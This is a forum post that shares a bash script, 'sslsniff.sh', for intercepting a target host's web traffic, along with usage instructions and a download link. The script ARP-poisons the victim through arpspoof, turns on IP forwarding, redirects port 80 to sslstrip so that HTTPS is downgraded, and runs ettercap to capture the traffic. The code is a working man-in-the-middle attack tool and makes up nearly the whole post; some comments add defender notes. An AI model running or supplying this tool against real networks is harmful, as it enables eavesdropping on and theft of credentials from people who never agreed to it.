Old 11-14-2009, 01:47 PM
sslsniff.sh

@admins: if you feel this is a duplicate post, let me know and delete it, and I will move back to where this originated; but given the revisions, etc., I didn't want to hijack the original post.

This script is not intended for illegitimate uses, I am in no way responsible for the way you use this, or the decisions you make.

This is a script I wrote for SSL sniffing.
ToDO:
- ensure ip_forward is always set

General Usage:
./sslsniff.sh -v <ip of target> -g <ip of gateway>
-v and -g are the only required flags, the rest are optional.
if -s is not specified sslstrip defaults to port 10000
-h for help

Download: mediafire.com/?nmtz2tjvuyj
Code:
#!/bin/bash
#
# Synopsis:	A program to sniff traffic in an SSL connection
# Author:		thims (thims DOT local AT gmail DOT com)
# Version:	0.3
# Date:			20091107
# Comments:	
#		ToDO:


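# Defaults. victim, gateway and iface stay empty until an option sets them.
# iface is initialised here as well so that a value inherited from the
# caller's environment can never end up in the commands this script runs.
victim=
gateway=
iface=
sslPort=10000
etterConf=/etc/etter.conf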

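# Print the usage text to stdout.
# Outputs: one usage line followed by one line per option.
# The long form listed for -g is --gw, the spelling the option parser accepts.
function help() {
	cat << EOF
Usage: $0 [args] host
    -h, --help     -  Print this help and exit
    -i, --iface    -  Interface to use
    -e, --etconf   -  Location of etter.conf on the filesystem
    -v, --victim   -  IP address of desired host
    -g, --gw       -  IP address of network gateway
    -s, --sslport  -  Desired port for sslstrip
EOF
}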

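# Print an optional message and terminate the script with status 1.
# Arguments: $1 - message to print (optional)
# Outputs:   the message on stderr, so it stays out of captured stdout
# Returns:   never; always exits 1
function die() {
	if [ -n "$1" ] ;then
		# printf instead of echo: a message such as "-n" is printed literally
		printf '%s\n' "$1" >&2
	fi
	exit 1
}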

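# Launch a command in the background under nohup and report whether a process
# for it exists five seconds later.
# Arguments: $1 - command line as one string (program followed by arguments)
# Returns:   0 if a PID was found, 1 if not or if $1 is empty
# The lookup is by program name, so an unrelated process with the same name
# also counts as "running".
function noHup() {
	local cmd="$1" prog pid

	# The first whitespace-separated word is the program name.
	read -r prog _ <<< "$cmd"
	if [ -z "$prog" ] ;then
		return 1
	fi

	# shellcheck disable=SC2086 -- $cmd is split on purpose into program + args
	nohup $cmd > /dev/null 2>&1 &
	sleep 5

	# sslstrip runs under the python interpreter, so pidof cannot find it by name
	if [ "$prog" == "sslstrip" ] ;then
		pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')
	else
		pid=$(pidof "$prog")
	fi

	[ -n "$pid" ]
}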

# Start arpspoof in the background through noHup and record its PID.
# Globals:  iface, victim, gateway (read)
# Outputs:  progress text on stdout; /var/run/sslsniff.arpspoof.run
# Exits through die when noHup reports that no arpspoof process is running.
# Defender note: as arpspoof is invoked here, the victim's ARP cache ends up
# mapping the gateway IP to this host's MAC address while it runs; ARP
# monitoring or dynamic ARP inspection on the switch is the usual control
# that detects or blocks that.
function spoofMac() {
	echo -n "Poisoning the victim...."
	# NOTE(review): the inner double quotes close and reopen the string, so
	# $iface, $victim and $gateway expand unquoted and are word-split and
	# glob-expanded before noHup sees them; noHup reads only its first argument.
	noHup "arpspoof "$iface" -t "$victim" "$gateway""
	if [ $? -gt 0 ] ;then
		die "Error: could not initiate arpspoof. Dieing..."
	fi
	# pidof matches by name, so this records every running arpspoof, not only
	# the one started above; cleanUp later signals whatever is listed here.
	echo $(pidof arpspoof) > /var/run/sslsniff.arpspoof.run
	echo "Ok"
}

# Turn on IPv4 forwarding, redirect inbound tcp/80 to $sslPort and start
# sslstrip through noHup.
# Globals:  sslPort (read)
# Outputs:  progress text on stdout; /var/run/sslsniff.sslstrip.run
# Host artifacts while this is active: ip_forward set to 1, one nat/PREROUTING
# REDIRECT rule for tcp/80, and the PID file above.
# Defender note: only port 80 is redirected, so the interception depends on the
# client sending a plain-HTTP request; a site the browser already pins to HTTPS
# (HSTS) does not produce one.
function sslInit() {
	echo -n "Setting up SSL intercept...."
	# The previous ip_forward value is not saved anywhere before it is overwritten.
	echo 1 > /proc/sys/net/ipv4/ip_forward
	# Re-write the flag until a read returns something other than 0.
	# NOTE(review): this loops forever if the write keeps failing (for example
	# when the script is not run with enough privilege) — confirm.
	while [ $(cat /proc/sys/net/ipv4/ip_forward) == 0 ]
	do
		echo 1 > /proc/sys/net/ipv4/ip_forward
	done

	# The rule is appended before sslstrip is known to be running.
	iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
	# NOTE(review): the inner quotes leave $sslPort unquoted inside the string.
	noHup "sslstrip -a -f -k -l "$sslPort""
	if [ $? -gt 0 ] ;then
		# die exits immediately: the iptables rule and ip_forward=1 set above
		# stay in place, and nothing here stops the arpspoof started earlier.
		die "Error: could not initiate sslstrip. Dieing..."
	fi
	# Records the PID of every process whose ps line contains both "python"
	# and "sslstrip", not only the one started above.
	echo $(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') > /var/run/sslsniff.sslstrip.run
	echo "Ok"
}

# Uncomment the iptables redirect lines in $etterConf, then run ettercap in the
# foreground until it exits.
# Globals:  etterConf, iface (read)
# Outputs:  progress text on stdout; modifies $etterConf in place
function capture() {
	# Collect the line number of every line that contains "redir" (any case)
	# and "iptables", then delete the first '#' found on each of those lines.
	# The file is edited in place and no backup copy is kept, so the original
	# content can only be reconstructed, not restored.
	for linNum in $(cat "$etterConf" | grep -in redir | grep iptables | awk -F: '{print $1}')
	do
		sed -i $linNum's/#//' "$etterConf"
	done

	echo -n "Starting to sniff...."
	# Runs in the foreground; initialize does not reach cleanUp until this returns.
	# "$iface" is passed as a single argument and is empty when -i was not given.
	ettercap -T -q "$iface"
}

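# Signal every PID listed in a PID file, then delete the file.
# Arguments: $1 - PID file, $2 - signal number
# A missing file is skipped and non-numeric entries are ignored, so kill is
# never called with an empty or malformed argument list.
function _signalFromPidFile() {
	local pidFile="$1" sig="$2" pid
	local -a pids=()

	if [ -r "$pidFile" ] ;then
		read -r -a pids < "$pidFile"
		for pid in "${pids[@]}"
		do
			case "$pid" in
				''|*[!0-9]*) continue ;;
			esac
			kill -n "$sig" "$pid"
		done
	fi
	rm -f -- "$pidFile"
}

# Undo the changes made while the script was running: stop sslstrip and
# arpspoof, remove the NAT redirect rule, switch IPv4 forwarding off and
# comment the etter.conf redirect lines again.
# Globals:  sslPort, etterConf (read)
# Outputs:  progress text on stdout
function cleanUp() {
	local linNum

	echo "Cleaning up...."
	echo -n "Closing SSL proxy...."
	# 15 = SIGTERM, the default signal of a plain kill
	_signalFromPidFile /var/run/sslsniff.sslstrip.run 15
	echo "Ok"
	echo -n "Unpoisoning the victim...."
	# 2 = SIGINT
	_signalFromPidFile /var/run/sslsniff.arpspoof.run 2
	echo "Ok"
	echo -n "Removing iptables rule and ip_forwarding...."
	iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
	# NOTE(review): forwarding is forced to 0 whatever it was before the run;
	# on a host that routes traffic for other reasons this must be set back by hand.
	echo 0 > /proc/sys/net/ipv4/ip_forward
	echo "Ok"

	# Comment every line that mentions both "redir" and "iptables".
	# NOTE(review): this matches the original state only if each of those lines
	# started out commented with a single leading '#'.
	echo -n "Returning etter.conf to the configuration we found it with...."
	for linNum in $(grep -in redir "$etterConf" | grep iptables | awk -F: '{print $1}')
	do
		sed -i "${linNum}s/^/#/" "$etterConf"
	done
	echo "Ok"
	echo "Have a nice day!"
}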

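# Validate the required settings, print them, then run the stages in order:
# spoofMac, sslInit, capture, cleanUp.
# Globals:  victim, gateway, iface, sslPort (read)
# Outputs:  usage text and an error when victim or gateway is missing,
#           otherwise a summary of the settings
# Once spoofMac has succeeded the victim's ARP cache and this host's network
# settings are being changed, so cleanUp is registered as an EXIT trap: a die
# in a later stage or a terminating signal still restores them.
function initialize() {
	if [ -z "$victim" ] || [ -z "$gateway" ] ;then
		help
		echo
		die "Error: a syntactical one"
	fi

	echo "Enviroment details:"
	echo "    Victim:         " "$victim" "  Ok!"
	echo "    Gateway/Router: " "$gateway" "  OK!"
	echo "    Interface:      " "$iface" "  OK!"
	echo "    SSLStrip port:  " "$sslPort" "  OK!"

	spoofMac
	trap cleanUp EXIT
	sslInit
	capture
	# Normal path: drop the trap first so cleanUp runs exactly once.
	trap - EXIT
	cleanUp
}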


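# Parse the command line. -h takes no value; every other option takes exactly
# one, which is consumed together with the option so it is never re-read as an
# option of its own. Arguments that are not options are ignored.
while [ $# -gt 0 ]
do
	# Refuse a missing or empty value before any option-specific handling.
	case "$1" in
		-v|--victim|-g|--gw|--gateway|-s|--sslport|-i|--iface|-e|--etconf)
			if [ $# -lt 2 ] || [ -z "$2" ] ;then
				help
				echo
				die "Error: a syntactical one"
			fi
		;;
	esac

	case "$1" in
		"-h"|"--help")
			help
			die
		;;
		"-v"|"--victim")
			victim="$2"
			shift
		;;
		# --gateway is accepted next to --gw because the usage text has advertised it
		"-g"|"--gw"|"--gateway")
			gateway="$2"
			shift
		;;
		"-s"|"--sslport")
			# The port ends up in an iptables rule and a command string run
			# with privileges, so anything but digits is rejected here.
			case "$2" in
				*[!0-9]*)
					die "Error: sslstrip port must be a number!"
				;;
			esac
			sslPort="$2"
			shift
		;;
		"-i"|"--iface")
			# Any non-zero status counts as "not there", including a missing
			# ifconfig binary, so an unchecked name is never accepted.
			if ! ifconfig "$2" > /dev/null 2>&1 ;then
				die "Error: interface $2 does not exist!"
			fi
			iface="-i $2"
			shift
		;;
		"-e"|"--etconf")
			if [ ! -e "$2" ] ;then
				die "Error: specified ettercap conf does not exist!"
			fi
			etterConf="$2"
			shift
		;;
		'')
			help
			echo
			die "Error: a syntactical one"
		;;
		-*)
			help
			echo
			die "Error: a syntactical one"
		;;
	esac
	shift
done


# main loop
initialize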
All suggestions, comments, feedback, etc. are more than welcome; I would love to hear what your thoughts are.

Also I take suggestions/requests for scripts.